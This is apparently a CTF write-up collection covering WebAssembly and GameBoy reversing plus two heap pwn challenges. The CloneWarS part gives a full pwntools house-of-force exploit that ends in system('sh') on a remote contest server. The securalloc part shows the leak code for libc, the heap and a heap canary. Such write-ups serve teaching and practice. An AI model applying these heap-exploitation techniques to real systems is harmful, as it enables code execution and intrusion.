decompiled.js  hxp2019_bg.c  hxp2019_bg.h

Lets start first with the decompiled file which is a lot easier to read:

Looking at the hxp2019_check_h578f31d490e10a31

Checking the verifications of the rest of the characters:

Now that we know what is going on, we can start to look where the final check is located in the c generated files, so we can do dynamic analysis with gdb…

First let’s fix some wrong paths at hxp2019_bg.c from:

#include 
#include 

#include "../../challenge/hxp2019_bg.h"
...

To:

#include 
#include 

#include "hxp2019_bg.h"
...

The function in c is named hxp2019__check__h578f31d490e10a31:

static u32 hxp2019__check__h578f31d490e10a31(u32 p0, u32 p1) {
  u32 l2 = 0, l3 = 0, l4 = 0, l5 = 0, l6 = 0, l7 = 0, l8 = 0, l9 = 0, 
      l10 = 0;
  FUNC_PROLOGUE;
  u32 i0, i1, i2;
  ...
  i1 &= i2;
  i0 = i0 == i1; // final check is here we might want to put a breakpoint here.
  if (i0) {goto L7;}
  ...
}

Putting a break point there is a solution but this makes a lot of effort to make the conditions always true and check the correct character.

We could also write a gdbscript or r2script but once again takes a lot of time…

Since this c files are compilable we can just modify the source code to print the flag characters and turn this condition to always return true.

But first we need to learn how to compile this kind of auto generated files, an example can be found at the wabt directory:

# dependencies
$ ls ../wabt/wasm2c/
wasm-rt.h  wasm-rt-impl.c  wasm-rt-impl.h
$ cp ../wabt/wasm2c/wasm-rt.h .
$ cp ../wabt/wasm2c/wasm-rt-impl.c .
$ cp ../wabt/wasm2c/wasm-rt-impl.h .
# Copying fac example files
$ ls ../wabt/wasm2c/examples/fac/
fac.c  fac.h  fac.wasm  fac.wat  main.c
$ cp ../wabt/wasm2c/examples/fac/* .
$ rm fac.c fac.h fac.wasm

Now looking at the example of main.c file from fac:

#include 
#include 

/* Uncomment this to define fac_init and fac_Z_facZ_ii instead. */
/* #define WASM_RT_MODULE_PREFIX fac_ */

#include "fac.h" // Change this to hxp2019_bg.h

int main(int argc, char** argv) {
  /* Make sure there is at least one command-line argument. */
  if (argc < 2) return 1;

  /* Convert the argument from a string to an int. We'll implictly cast the int
  to a `u32`, which is what `fac` expects. */
  u32 x = atoi(argv[1]);

  /* Initialize the fac module. Since we didn't define WASM_RT_MODULE_PREFIX,
  the initialization function is called `init`. */
  init();

  /* Call `fac`, using the mangled name. */
  u32 result = Z_facZ_ii(x); // We need to change this function too the real name is located at hxp2019_bg.h

  /* Print the result. */
  printf("fac(%u) -> %u\n", x, result);

  return 0;
}

As you can see we need to adapt the example main function the current file we want to debug to find the correct Z_xxxZ function we can look at the header file generated hxp2019_bg.h:

The adapted main.c file:

#include 
#include 

/* Uncomment this to define fac_init and fac_Z_facZ_ii instead. */
/* #define WASM_RT_MODULE_PREFIX fac_ */

#include "hxp2019_bg.h"
/*
b hxp2019_bg.c:2268
b hxp2019_bg.c:2434
r 1048576 50
*/
int main(int argc, char** argv) {
  /* Make sure there is at least one command-line argument. */
  if (argc < 2) return 1;

  /* Convert the argument from a string to an int. We'll implictly cast the int
  to a `u32`, which is what `fac` expects. */
  u32 x = atoi(argv[1]);
  u32 y = atoi(argv[2]);

  /* Initialize the fac module. Since we didn't define WASM_RT_MODULE_PREFIX,
  the initialization function is called `init`. */
  init();

  /* Call `fac`, using the mangled name. */
  u32 result = Z_checkZ_iii(x,y); // 1048576 50

  /* Print the result. */
  printf("check(%u,%u) -> %u\n", x,y, result);

  return 0;
}

Let’s use gcc to compile everything:

$ gcc -m32 -ggdb wasm-rt-impl.c -o wasm-rt-impl.o -c
$ gcc -m32 -ggdb hxp2019_bg.c -o hxp2019_bg.o -c
$ gcc -m32 -ggdb main.c -o main.o -c
# linking everything
$ gcc -m32 -ggdb -o main main.o hxp2019_bg.o wasm-rt-impl.o
$ ./main 1048576 50
check(1048576,50) -> 0

Generating a make file so we don’t have to repeat ourselfs over and over:

CC=gcc
CFLAGS=-I. -ggdb -m32
DEPS = hxp2019_bg.h wasm-rt.h wasm-rt-impl.h
OBJ = hxp2019_bg.o wasm-rt-impl.o main.o

%.o: %.c $(DEPS)
$(CC) -c -o $@ $< $(CFLAGS)

main: $(OBJ)
$(CC) -o $@ $^ $(CFLAGS)
clean:
rm *.o
rm -f main

Now we just need do make clean and make to compile everything:

$ make clean
rm *.o
rm -f main
$ make
gcc -c -o hxp2019_bg.o hxp2019_bg.c -I. -ggdb -m32
gcc -c -o wasm-rt-impl.o wasm-rt-impl.c -I. -ggdb -m32
gcc -c -o main.o main.c -I. -ggdb -m32
gcc -o main hxp2019_bg.o wasm-rt-impl.o main.o -I. -ggdb -m32

Note that the flag -m32 is to compile the binary in 32 bits and the -ggdb is to add symbols to gdb so we can debug everything and watch the source code instead of only viewing the assembly :).

Now advancing to change hxp2019_bg.c file to print us the flag on execution we need to populate the input string before doing the checks, also that loop we investigated before is only doing the checks inside of the flag brackets hxp{…}, the rest of the flag is being checked somewhere else in the code, we don’t really need to know where, we just need to populate the begining and the end with the right characters and the rest with As…

Let’s do a function that does that:

void populate() {
  memory.data[1048576u+0] = 'h'; // i32_store((&memory), (u64)(1048576u + 0), 'h');
  memory.data[1048576u+1] = 'x';
  memory.data[1048576u+2] = 'p';
  memory.data[1048576u+3] = '{';
  
  for (int i = 4; i < 49; ++i) {
    memory.data[1048576u+i] = 'A';
  }
  memory.data[1048576u+49] = '}';
}

We add this call before the check call at static u32 check(u32 p0, u32 p1):

static u32 check(u32 p0, u32 p1) {
...
populate();
i0 = hxp2019__check__h578f31d490e10a31(i0, i1);
...

Now modifying hxp2019__check__h578f31d490e10a31:

static u32 hxp2019__check__h578f31d490e10a31(u32 p0, u32 p1) {
  printf("%s","hxp{"); // print flag header
  ...
  i0 = i32_load8_u((&memory), (u64)(i0));
  i1 = l6;
  i2 = 255u;
  i1 &= i2;
  i1 = i0; // make the condition always true
  printf("%c", i1); // print current flag character
  i0 = i0 == i1; // condition
  if (i0) {goto L7;} // continue with the loop
  ...
  puts("}");
  return i0;
}

You can download the files here.

Now compiling everything with make:

$ make
gcc -c -o hxp2019_bg.o hxp2019_bg.c -I. -ggdb -m32
gcc -c -o wasm-rt-impl.o wasm-rt-impl.c -I. -ggdb -m32
gcc -c -o main.o main.c -I. -ggdb -m32
gcc -o main hxp2019_bg.o wasm-rt-impl.o main.o -I. -ggdb -m32

Running and getting the flag:

1
2
3

$ ./main 1048576 50
hxp{merry_xmas___github.com/benediktwerner/rewasm}
check(1048576,50) -> 1

[Reverse] Kipod2019 - GameBob

2019-12-26T12:31:45.000Z

GameBob
Points
80
Solves
16
Category
Reverse
Description:
I built that small GameBoy program that just prints out the flag, and I don’t think I forgot anything.
GameBob.gb
GameBob.sym

We have both GameBob.gb ROM and GameBob.sym which containts the symbol names to the functions which will help a lot on the reverse job.

Unlike in a previous write up I actually managed to work with bdb which is a much better debugger than No\$GMB. bgb not only has more options that also doesn’t have some random crashes that I was experience with No$GMB. Actually bgb is works in a very similar way.

Here are some of the shortcuts I used while using this debugger:

F2 - Break Point
F3 - Step
F6 - Jump to Cursor (Modifies the PC(program counter) register to the address at the cursor) 
CTRL + F - Search for a string (nice to search for symbol names)
CTRL + G - Jump to specified address

After opening bgb we right click on the window to load the ROM, after that the game will start playing but the debugger window won’t show up unless we right click again (other -> Debugger):

Since we have symbols to find the main function we can just use CTRL+F and search for main, then just put a break point in the beginning with F2, note that while we are focusing the Debugger Window the game is frozen but if we click on the game window the game runs it works like a continue instruction in gdb:

After inserting the breakpoint at the main and do some steps with F3 right before executing the .

If we step over from call print_string_delayed we will see that the parameters passed to this function is the string that will be printed (“Welcome to the Game Bob”):

If we do a few more steps we can see and after stepping over the 2nd print_string_delayed the string printed to the string will be “It’s a really easy challenge, so here is your flag”:

After this a stack is created at the global flag_stack (D000):

Using CTRL+G on the hexviewer to watch memory region at (D000):

After doing multiple calls after executing call print_stack we can view in memory that multiple characters were pushed into the stack this were encrypted flag characters:

So obviously something is missing after looking at the file with the symbols I found a function with a suspicious name called _secret which basically pops the encrypted characters from the stack and pushes the decrypted flag characters. There are no calls to this function so one of the solutions would be to patch the file, perhaps I didn’t resorted to this solution, instead I just used jumps to jump to _secret function before the arguments of print_stack call:

This can be done by using the functionality jump to cursor (Shortcut F6) that the debugger offers, we could also changed the register manually at the top right corner where the registers are shown:

Putting a break point at the end of the function (ret instruction located at 0x4da) we can see new items were pushed into the stack:

Now jumping back back to main using jump to cursor

Now doing a couple of steps print_stack will execute and print the flag into the screen:

[Pwn] Kipod2019 - CloneWarS

2019-12-26T04:28:38.000Z

CloneWarS
Points
90
Solves
13
Category
Pwn
Description:
A long time ago in a galaxy far, far away….
ssh yeet@ctf2.kaf.sh -p 7000 password: 12345678
CloneWarS

TLDR

Leak heap from R2D2
Overflow top_chunk size
Leak global file pointer
Use house of force to write into file
Trigger system(file)

Binary Analysis

The binary is the only file we get from this challenge:

1
2

$ file CloneWarS
CloneWarS: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, for GNU/Linux 3.2.0, BuildID[sha1]=a45e46d5347deb6022d64604638a3ed70e8de417, not stripped

From the file command output we know that:

ELF compiled for x86_x64 architecture
Dynamically linked
Not stripped

Using checksec to see the enabled protections:

$ checksec CloneWarS
[*] '/ctf/work/pwn/CloneWarS/CloneWarS'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

FULL RELRO (GOT entries are read only we can’t overwrite them)
STACK CANARY (The stack is protected with the canary if there is a stack overflow we need to find a way to leak it)
NX (Non executable stack)
PIE (Position Independent Executable) is on (If we want to use rop we need a way to leak the base address)

Static Analysis

Using Ida to check on the main function we can see we have a bunch of options:

while ( v3 != 7 )
  {
    switch ( v3 )
    {
      case 1LL:
        build_death_star(); // option 1
        break;
      case 2LL:
        R2D2(); // option 2
        break;
      case 3LL:
        prep_starship(); // option 3
        break;
      case 4LL:
        make_troopers(); // option 4
        break;
      case 5LL:
        light_sabers(); // option 5
        break;
      case 6LL:
        cm2_dark_side(); // option 6
        break;
      default:
        break;
    }

By looking at build_death_star:

unsigned __int64 build_death_star()
{
  int v1; // [rsp+Ch] [rbp-14h]
  unsigned __int64 v2; // [rsp+18h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  v1 = 0;
  fwrite("Assemble death star: ", 1uLL, 0x15uLL, stderr);
  __isoc99_scanf("%d", &v1); // We can control the size of the allocated string
  malloc(v1); // allocated object (the pointer not saved anywhere)
  return __readfsqword(0x28u) ^ v2;
}

As we can see above we have a controlled sized malloc this is important if we want to use certain exploits on the heap.

By looking at R2D2:

unsigned __int64 R2D2()
{
  int v1; // [rsp+Ch] [rbp-14h]
  char *v2; // [rsp+10h] [rbp-10h]
  unsigned __int64 v3; // [rsp+18h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  v1 = 0;
  fwrite("R2? ", 1uLL, 4uLL, stderr);
  __isoc99_scanf("%x", &v1);
  v2 = (char *)starships + 272;
  fprintf(stderr, "\nR2D2 IS .... %ld ...... ON THIS TRACK !! 0x6733894F08\n", (char *)starships + 272);// Leak Heap
  getchar();
  return __readfsqword(0x28u) ^ v3;
}

R2D2 gives us a free leak to the heap because of this we can calculate the offset to the HEAP BASE.

Checking out theprep_starship:

unsigned __int64 prep_starship()
{
  int v1; // [rsp+4h] [rbp-2Ch]
  int c; // [rsp+8h] [rbp-28h]
  int v3; // [rsp+Ch] [rbp-24h]
  unsigned __int64 v4; // [rsp+28h] [rbp-8h]

  v4 = __readfsqword(0x28u);
  v1 = 0;
  fwrite("Master, the amount of starships: ", 1uLL, 0x21uLL, stderr);
  __isoc99_scanf("%d", &v1); // reads size from the stdin
  starships = malloc(v1); // a new allocated starship with a controllable size
  c = 0;
  v3 = 0;
  fwrite("\nWhat kind of starships?: ", 1uLL, 0x1AuLL, stderr);
  __isoc99_scanf("%x", &c); // Value to be set
  fwrite("\nCapacity of troopers in the starships: ", 1uLL, 0x28uLL, stderr);
  __isoc99_scanf("%d", &v3); // Number of bytes
  memset(starships, c, v3); // Heap Overflow
  return __readfsqword(0x28u) ^ v4;
}

As you can see because of memset we can overflow the heap by an amount we can control (capacity of the troppers) and we can also control the content that will overflow it (kind of starships).

Analysing make_troopers

unsigned __int64 make_troopers()
{
  int v1; // [rsp+Ch] [rbp-34h]
  char *dest; // [rsp+10h] [rbp-30h]
  char src[8]; // [rsp+18h] [rbp-28h]
  char buf; // [rsp+20h] [rbp-20h]
  unsigned __int64 v5; // [rsp+38h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  fwrite("\nTroopers to be deployed: ", 1uLL, 0x1AuLL, stderr);
  read(0, &buf, 0x14uLL); // content limited to 0x14 bytes
  v1 = atoi(&buf);
  dest = (char *)malloc(v1); // once again a controllable sized malloc 
  fwrite("\nWhat kind of troopers?: ", 1uLL, 0x19uLL, stderr);
  src[(int)((unsigned __int64)read(0, src, 8uLL) - 1)] = 0; // puts a null byte at the (8-1) position of the string
  strcpy(dest, src); // puts the content from stdin into the new allocated chunk
  return __readfsqword(0x28u) ^ v5;
}

Nothing wrong with this one (in terms of security at least) but this one can be useful to store some content to a certain pointer specially if we manage to make malloc return an arbirtrary pointer to a place we want.

light_sabers is the same as make_troopers but instead of putting a null byte at the 8th position of the read string it puts at the 0x14-1 which is right at the end of the string.

Analysing cm2_dark_side:

int cm2_dark_side()
{
  fprintf(stderr, "\nFile is at: %ld\n", file); // file pointer leaked
  return system(file); // system call
}

file is a global variable located at the BSS once again we get a free leak with this we can get the offset to the pie base and get access to the rest of the global variables, this function also hints us that the final objective of this challenge is to find a way to change the content of file to get a shell or print the flag.

House of force the jedi overflow

It’s not a coincidence that the theme of this challenge is about star wars, Obi wan intuitively says to us:

The ingredients to use house of force can be interpreted as follows:

The exploiter must be able to overwrite the top chunk.
There is a malloc() call with an exploiter-controllable size.
There is another malloc() call where data are controlled by the exploiter.

We checked all the requirements:

We have a heap-overflow at the function prep_starship through memset.
We have a multiple malloc calls with controllable sizes for example in build_death_star.
We have a malloc call where we can control its data in make_troopers and light_sabers.

So the core of this attack is to overwrite av->top with an big arbitrary value so it can later force malloc (which uses the top chunk) to return an arbitrary pointer to an address we want to modify.

So what is the top_chunk ? top_chunk also known as the wilderness is a special chunk that defines how much space is left in the current heap arena, this chunk is located at the top of the heap.

On this sample program we can see right after the first allocation the heap is initialized, the first chunk is the tc ache_p_struct next is the allocated chunk by us.
Finally right at the top of the heap we have the wilderness the space left in the arena is defined in the field mchunk_size so lets see what happens when we allocate a 2nd chunk:

When it exceeds the space left, heap expansion is triggered mapping a new memory page.

So what happens when the top chunk is used to allocate the size of the heap block to any value controlled by the user? The answer is that you can make the top chunk point to whatever we want (yes everywhere even in a position before because of overflow), which is equivalent to an arbitrary address write. However, in glibc, the size of the user request and the existing size of the top chunk are verified.

Void_t*
_int_malloc(mstate av, size_t bytes) {
  INTERNAL_SIZE_T nb;               /* normalized request size */

  [...]

  mchunkptr       victim;           /* inspected/selected chunk */
  INTERNAL_SIZE_T size;             /* its size */
  int             victim_index;     /* its bin index */

  mchunkptr       remainder;        /* remainder from a split */
  unsigned long   remainder_size;   /* its size */

  [...]

  checked_request2size(bytes, nb);

  [...]

  /* finally, do the allocation */
  p = av->top;
  size = chunksize (p);

  /* check that one of the above allocation paths succeeded */
  if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
    {
      remainder_size = size - nb;
      remainder = chunk_at_offset (p, nb);
      av->top = remainder;
      set_head (p, nb | PREV_INUSE | (av != &main_arena ? NON_MAIN_ARENA : 0));
      set_head (remainder, remainder_size | PREV_INUSE);
      check_malloced_chunk (av, p, nb);
      return chunk2mem (p);
    }
    [...]
}

Perhaps, if you can override with size to a large value, you can easily pass this verification, we can do this with an overflow vulnerability to tamper the top_chunk size.

1	(unsigned long) (size) >= (unsigned long) (nb + MINSIZE)

In the Malloc Maleficarum it is written that the wilderness chunk should have the highest size possible (preferably 0xFFFFFFFFFFFFFFFF) which is the largest number in unsigned long in x64.

/* Treat space at ptr + offset as a chunk */
#define chunk_at_offset(p, s)  ((mchunkptr) (((char *) (p)) + (s)))

remainder = chunk_at_offset (p, nb);
av->top = remainder;

After that, the top pointer will be updated, and the next heap block will be allocated to this location.

Writing the exploit

The first thing is find a way to connect with SSH to connect to the server I did that with:

1 2	r =process("sshpass -p 12345678 ssh -p 7000 -tt yeet@ctf2.kaf.sh".split()) r.interactive()

You need to have sshpass installed tho and also you need to add the server ip to the known hosts before which can be done by saying yes while connecting for the first time via command line:

1	$ ssh -p 7000 yeet@ctf2.kaf.sh

First we need to get a HEAP address leak we can get this by executing R2D2 option:

def r2d2(n):
r.sendlineafter('Your choice: ', '2')
r.sendlineafter('R2? ', '2')

def pstarships(size, kind, capacity):
r.sendlineafter('Your choice: ', '3')
r.sendlineafter('Master, the amount of starships: ', str(size))
r.sendlineafter('What kind of starships?: ', kind)
r.sendlineafter('Capacity of troopers in the starships: ', str(capacity))
r = getConn()
pstarships(0x30, 'A', 0x30)
r2d2(-1)
r.recvuntil('R2D2 IS .... ')
HEAP_L = int(r.recvregex(r'(\d+) '))

Next step is to tamper the size of the wilderness with pstartships via memset:

1 2	# OVERFLOW TOP_CHUNK pstarships(0x30, "FF", 0x40) # Overflow Top Chunk

The top_chunk before overflow:

The top_chunk after overflow:

Now the place we want to write is at FILE global string pointer we can do this by going to the darkside(cm2_dark_side):

# LEAK FILE PTR
r.sendlineafter('Your choice: ', '6')
r.recvuntil('File is at: ')
FILE = int(r.recvline().rstrip())
log.info("FILE ADDR 0x%x" % FILE)

Now we calculate the evilsize required to write at FILE can be done with FILE-TOP_CHUNK-8*4:

HEAP = HEAP_L-0x1380 # HEAPBASE
SIZE_OF_LONG = 0x8 # sizeof(long) -> 8 in 64 bits
WILD_OFFSET = 0x12e0 # Current TOP_CHUNK offset
TOP_CHUNK = HEAP+WILD_OFFSET+SIZE_OF_LONG*4
r.sendlineafter('Your choice: ', '1')
buildDeathStar(FILE-TOP_CHUNK) # Malloc will return an arbitrary pointer to FILE

To calculate WILD_OFFSET you can put a break point right before malloc inside buildDeathStar and calculate with this:

Write sh into file:

r.sendlineafter('Your choice: ', '4')
r.sendlineafter('What kind of troopers?: ', 'sh') # Modify file with sh
r.sendlineafter('Your choice: ', '6') # Trigger system("sh")
r.interactive()

The full exploit:

from pwn import *
filename = "./CloneWarS"
elf = ELF(filename)
context.arch = 'amd64'

def getConn():
    return process(filename) if not args.REMOTE else process("sshpass -p 12345678 ssh -p 7000 -tt yeet@ctf2.kaf.sh".split())

def get_PIE(proc):
    memory_map = open("/proc/{}/maps".format(proc.pid),"rb").readlines()
    return int(memory_map[0].split("-")[0],16)

def debug(bp):
    script = ""
    PIE = get_PIE(r)
    PAPA = PIE
    for x in bp:
        script += "b *0x%x\n"%(PIE+x)
    gdb.attach(r,gdbscript=script)

def r2d2(n):
    r.sendlineafter('Your choice: ', '2')
    r.sendlineafter('R2? ', '2')

def pstarships(size, kind, capacity):
    r.sendlineafter('Your choice: ', '3')
    r.sendlineafter('Master, the amount of starships: ', str(size))
    r.sendlineafter('What kind of starships?: ', kind)
    r.sendlineafter('Capacity of troopers in the starships: ', str(capacity))

def lightsabers(nLs, color):
    r.sendlineafter('Your choice: ', '5')
    r.sendafter('How many lightsabers do you think you will need?: ', '\n')
    r.sendline(str(nLs))
    r.sendafter('What color would you like on your light sabers: ', color)

def buildDeathStar(size):
    r.sendlineafter('Your choice: ', '1')
    r.sendlineafter('Assemble death star: ',str(size))
    
context.terminal = ['tmux', 'new-window']
r = getConn()

# LEAKING HEAP
pstarships(0x30, 'A', 0x30)
r2d2(-1)
r.recvuntil('R2D2 IS .... ')
HEAP_L = int(r.recvregex(r'(\d+) '))
log.info('HEAP ADDR 0x%x'% HEAP_L)

if not args.REMOTE and args.GDB:
    debug([0xB0F,0xC3C,0xA7D, 0xE00]) # 0xD94
# OVERFLOW TOP_CHUNK
pstarships(0x30, "FF", 0x40) # Overflow Top Chunk

# LEAK FILE PTR
r.sendlineafter('Your choice: ', '6')
r.recvuntil('File is at: ')
FILE = int(r.recvline().rstrip())
log.info("FILE ADDR 0x%x" % FILE)


HEAP = HEAP_L-0x1380 # HEAPBASE
SIZE_OF_LONG = 0x8 # sizeof(long) -> 8 in 64 bits
WILD_OFFSET = 0x12e0 # Current TOP_CHUNK offset
TOP_CHUNK = HEAP+WILD_OFFSET+SIZE_OF_LONG*4
r.sendlineafter('Your choice: ', '1')
buildDeathStar(FILE-TOP_CHUNK) # Calculate the evil size required to write to FILE
r.sendlineafter('Your choice: ', '4')
r.sendlineafter('What kind of troopers?: ', 'sh') # Modify file with sh
r.sendlineafter('Your choice: ', '6') # Trigger system("sh")
r.interactive()
r.close()

Running it:

$ python CloneWarS.py REMOTE
[+] Starting local process '/usr/bin/sshpass': pid 113679
[*] HEAP ADDR 0x555555757780
[*] FILE ADDR 0x555555756010
[*] Switching to interactive mode
6

File is at: 93824994336784
$ $ ls
ls
binary    flag.txt  skywalker.txt
$ $ cat flag.txt
cat flag.txt
KAF{MaY_tHe_F0RCE_B3_W1tH_YOUUU10293012884}

References

[Pwn] Asis Finals 2019 - securalloc

2019-11-18T03:01:32.000Z

Securalloc
Points
167
Solves
26
Category
Warm-up Pwnable
Description:
The key to success in the battlefield is always the secure allocation of resources!
nc 76.74.177.238 9001
libc.so.6
libsalloc.so
securalloc.elf

TLDR

Leak libc from _IO_2_1_stderr leftover
Leak heap from _IO_2_1_stderr leftover
Leak heap canary from /dev/random leftover
Apply House of Orange and get a shell.

Extract information

We have an extra shared library libsalloc.so to analyse but first lets check the security on securalloc.elf:

$ checksec securalloc.elf
[*] '/ctf/asis2019/pwn/securalloc/securalloc.elf'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

Full RELRO is enabled so GOT is read only this is something that we always should take in mind before proceeding any further.

Identifying the vulnerability

Now lets check for a vulnerability :

Elf analysis

Like other heap challenges we will have the classic functions print, create, delete and edit but this time we have an additional shared library named libsalloc.so and the functions used from it are:

secureinit

Opening libsalloc.so in ida we can see it uses fopen to open /dev/urandom to create a canary:

And why this is bad ? Looking at fopen internals:

FILE *
__fopen_internal (const char *filename, const char *mode, int is32)
{
  struct locked_FILE
  {
    struct _IO_FILE_plus fp;
#ifdef _IO_MTSAFE_IO
    _IO_lock_t lock;
#endif
    struct _IO_wide_data wd;
  } *new_f = (struct locked_FILE *) malloc (sizeof (struct locked_FILE)); // malloc call here

  if (new_f == NULL)
    return NULL;
#ifdef _IO_MTSAFE_IO
  new_f->fp.file._lock = &new_f->lock;
#endif
  _IO_no_init (&new_f->fp.file, 0, 0, &new_f->wd, &_IO_wfile_jumps);
  _IO_JUMPS (&new_f->fp) = &_IO_file_jumps;
  _IO_new_file_init_internal (&new_f->fp);
  if (_IO_file_fopen ((FILE *) new_f, filename, mode, is32) != NULL)
    return __fopen_maybe_mmap (&new_f->fp.file);

  _IO_un_link (&new_f->fp);
  free (new_f); // free call here
  return NULL;
}

So a malloc of struct locked_FILE is executed, this struct will store IO_FILE pointers and the /dev/urandom data.

struct _IO_FILE_plus

/* We always allocate an extra word following an _IO_FILE.
   This contains a pointer to the function jump table used.
   This is for compatibility with C++ streambuf; the word can
   be used to smash to a pointer to a virtual function table. */

struct _IO_FILE_plus
{
  FILE file;
  const struct _IO_jump_t *vtable;
};

Look in memory after running fopen:

struct _IO_wide_data

/* Extra data for wide character streams.  */
struct _IO_wide_data
{
  wchar_t *_IO_read_ptr;/* Current read pointer */
  wchar_t *_IO_read_end;/* End of get area. */
  wchar_t *_IO_read_base;/* Start of putback+get area. */
  wchar_t *_IO_write_base;/* Start of put area. */
  wchar_t *_IO_write_ptr;/* Current put pointer. */
  wchar_t *_IO_write_end;/* End of put area. */
  wchar_t *_IO_buf_base;/* Start of reserve area. */
  wchar_t *_IO_buf_end;/* End of reserve area. */
  /* The following fields are used to support backing up and undo. */
  wchar_t *_IO_save_base;/* Pointer to start of non-current get area. */
  wchar_t *_IO_backup_base;/* Pointer to first valid character of
   backup area */
  wchar_t *_IO_save_end;/* Pointer to end of non-current get area. */

  __mbstate_t _IO_state;
  __mbstate_t _IO_last_state;
  struct _IO_codecvt _codecvt;

  wchar_t _shortbuf[1];

  const struct _IO_jump_t *_wide_vtable;
};

The look in memory:

pwndbg> p *((_IO_lock_t*)0x000055dc452ed0f0)                                                                                 [33/1706]
$15 = {
  lock = 0, 
  cnt = 0, 
  owner = 0x0
}
pwndbg> p *((struct _IO_wide_data*)0x55dc452ed100)
$16 = {
  _IO_read_ptr = 0x0, 
  _IO_read_end = 0x0, 
  _IO_read_base = 0x0, 
  _IO_write_base = 0x0, 
  _IO_write_ptr = 0x0, 
  _IO_write_end = 0x0, 
  _IO_buf_base = 0x0, 
  _IO_buf_end = 0x0, 
  _IO_save_base = 0x0, 
  _IO_backup_base = 0x0, 
  _IO_save_end = 0x0, 
  _IO_state = {
    __count = 0, 
    __value = {
      __wch = 0, 
      __wchb = "\000\000\000"
    }
  }, 
  _IO_last_state = {
    __count = 0, 
    __value = {
      __wch = 0, 
      __wchb = "\000\000\000"
    }
  }, 

  _codecvt = {                                                                                                                
    __codecvt_destr = 0x0, 
    __codecvt_do_out = 0x0, 
    __codecvt_do_unshift = 0x0, 
    __codecvt_do_in = 0x0, 
    __codecvt_do_encoding = 0x0, 
    __codecvt_do_always_noconv = 0x0, 
    __codecvt_do_length = 0x0, 
    __codecvt_do_max_length = 0x0, 
    __cd_in = {
      __cd = {
        __nsteps = 0, 
        __steps = 0x0, 
        __data = 0x55dc452ed1b8
      }, 
      __combined = {
        __cd = {
          __nsteps = 0, 
          __steps = 0x0, 
          __data = 0x55dc452ed1b8
        }, 
        __data = {
          __outbuf = 0x0, 
          __outbufend = 0x0, 
          __flags = 0, 
          __invocation_counter = 0, 
          __internal_use = 0, 
          __statep = 0x0, 
          __state = {
            __count = 0, 
            __value = {
              __wch = 0, 
              __wchb = "\000\000\000"
            }
          }
        }
      }
    }, 
    __cd_out = {
      __cd = {
        __nsteps = 0, 
        __steps = 0x0, 
        __data = 0x55dc452ed1f8
      }, 
      __combined = {
        __cd = {
          __nsteps = 0, 
          __steps = 0x0, 
          __data = 0x55dc452ed1f8
        }, 
        __data = {
          __outbuf = 0x0, 
          __outbufend = 0x0, 
          __flags = 0, 
          __invocation_counter = 0, 
          __internal_use = 0, 
          __statep = 0x0, 
          __state = {
            __count = 0, 
            __value = {
              __wch = 0, 
              __wchb = "\000\000\000"
            }
          }
        }
      }
    }
  }, 
  _shortbuf = L"", 
  _wide_vtable = 0x7fb6d6371260 <_IO_wfile_jumps>
}

The /dev/urandom data:

This data is freed but not cleared which means later we can leak this data by overlapping new chunks and use the print function to leak libc, heap and even the heap canary created by this library.

securealloc

securealloc adds 0x10 more bytes to the allocated space to store a canary at the end of the chunk and the size at the beginning:

_DWORD *__fastcall secure_malloc(unsigned int size)
{
  _DWORD *v2; // [rsp+18h] [rbp-8h]

  v2 = malloc(size + 0x10); // integer overflow here btw :)
  if ( !v2 )
    __abort((__int64)"Resource depletion (secure_malloc)");
  *v2 = size;
  v2[1] = size + 1;
  *(_QWORD *)((char *)v2 + size + 8) = canary;
  return v2 + 2;
}

There is an integer overflow at malloc(size + 0x10) this could also be used to bypass the canary unfortunately the canary is going to be stored at a very high heap address which is unmapped we would have to expand the heap multiple times to get a mappable address, while this is feasible to do it locally it isn’t remotely because while there is a limit restriction of memory on the server we also would take 1 or 2 hours to do it (because we are communicating remotely).

securefree

There is a double free verification and also wipes out the chunk data before freeing.

void __fastcall secure_free(__int64 a1)
{
  int v1; // [rsp+18h] [rbp-8h]

  if ( a1 )
  {
    v1 = *(_DWORD *)(a1 - 8);
    if ( *(_DWORD *)(a1 - 4) - v1 != 1 )
      __abort((__int64)"*** double free detected ***:  terminated");
    __heap_chk_fail(a1);
    memset((void *)(a1 - 8), 0, (unsigned int)(v1 + 16));
    free((void *)(a1 - 8));
  }
}.

_heap_chk_fail

this the function that verifies if there is a heap overflow.

__int64 __fastcall _heap_chk_fail(__int64 a1)
{
  __int64 result; // rax
  unsigned int v2; // [rsp+10h] [rbp-10h]

  if ( a1 )
  {
    v2 = *(_DWORD *)(a1 - 8);
    result = *(_DWORD *)(a1 - 4) - v2;
    if ( (_DWORD)result == 1 )
    {
      result = canary;
      if ( *(_QWORD *)(v2 + a1) != canary )
        __abort((__int64)"*** heap smashing detected ***:  terminated");
    }
  }
  return result;
}

LEAK heap and libc address

This the looks of the memory after secure_init:

To leak both we can first allocate a chunk of 0x60 and then 0x30 (this one leaks heap) and then 0x10 (this one will leak IO_JUMP libc address).

The python code to do this:

add(0x60) # this one is freed for a reason this will be explained later
delete()
add(0x30)

show()
r.recvuntil('Data: ')
HEAPADDR = u64(r.recv(6).ljust(0x8,'\x00'))
HEAP = HEAPADDR - 0xf0
log.info("HEAPADDR 0x%x" % HEAPADDR)
log.info("HEAP 0x%x" % HEAP)


add(0x10)
show()
r.recvuntil('Data: ')
IOFILEJUMPS = u64(r.recv(6).ljust(0x8,'\x00')) # _IO_file_jumps

LIBC = IOFILEJUMPS - libc.symbols['_IO_file_jumps']
_IO_LIST_ALL = LIBC + libc.symbols['_IO_list_all']
SYSTEM = LIBC + libc.symbols['system']
log.info("IO_file_jumps 0x%x" % IOFILEJUMPS)
log.info("LIBC 0x%x" % LIBC)

Leak canary

The canary is located at /dev/urandom data:

We do the same thing by allocating first a chunk of data 0x140 and then 0x8:

# leak heap canary (/dev/urandom buffer)
add(0x140)
add(0x8)
show()
HEAPCANARY = u64(r.recvline().rstrip()[-7::].rjust(0x8,'\x00'))
log.info("HEAPCANARY 0x%x" % HEAPCANARY)

House of Orange

